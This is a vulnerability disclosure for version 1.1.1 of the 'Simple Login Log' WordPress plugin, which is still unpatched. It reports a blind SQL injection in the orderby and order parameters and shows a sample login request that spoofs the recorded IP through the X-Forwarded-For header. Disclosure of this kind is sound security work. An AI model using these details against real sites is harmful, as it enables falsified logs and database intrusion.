Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin

Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin

We discovered a vulnerability in a WordPress plugin called Simple Login Log Plugin.

Vulnerability: Authenticated Blind SQL Injection, Source IP Address Manipulation
Affected Version: 1.1.1 (below version may be affected as well)
Patched Version: Not available yet (vendor already contacted but no response)

Blind SQL Injection

===================

Affected URL: http://localhost/wp-admin/users.php?page=login_log&orderby=ip&order=asc
Affected Parameters: orderby and order

Screenshot

Source IP Address Manipulation

==============================

This plugin records the user’s IP address that has successfully logged in, using X-Forwarded-For HTTP header field.

$values = array(
'uid' => $uid,
'user_login' => $user_login,
'user_role' => $user_role,
'time' => current_time('mysql'),
'ip' => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? esc_attr($_SERVER['HTTP_X_FORWARDED_FOR']) : esc_attr($_SERVER['REMOTE_ADDR']),
'login_result' => $this->login_success,
'data' => $serialized_data,
);
 
$format = array('%d', '%s', '%s', '%s', '%s', '%s', '%s');
 
$this->save_data($values, $format);

Judging from line 6 above, we can put any value in the X-Forwarded-For field.

Example:

POST /wp/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-login.php
X-Forwarded-For: blablabla
Cookie: wordpress_test_cookie=WP+Cookie+check; PHPSESSID=45abjfebtenkrqikf108dlhca6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp%2Fwp-admin%2F&testcookie=1

Result: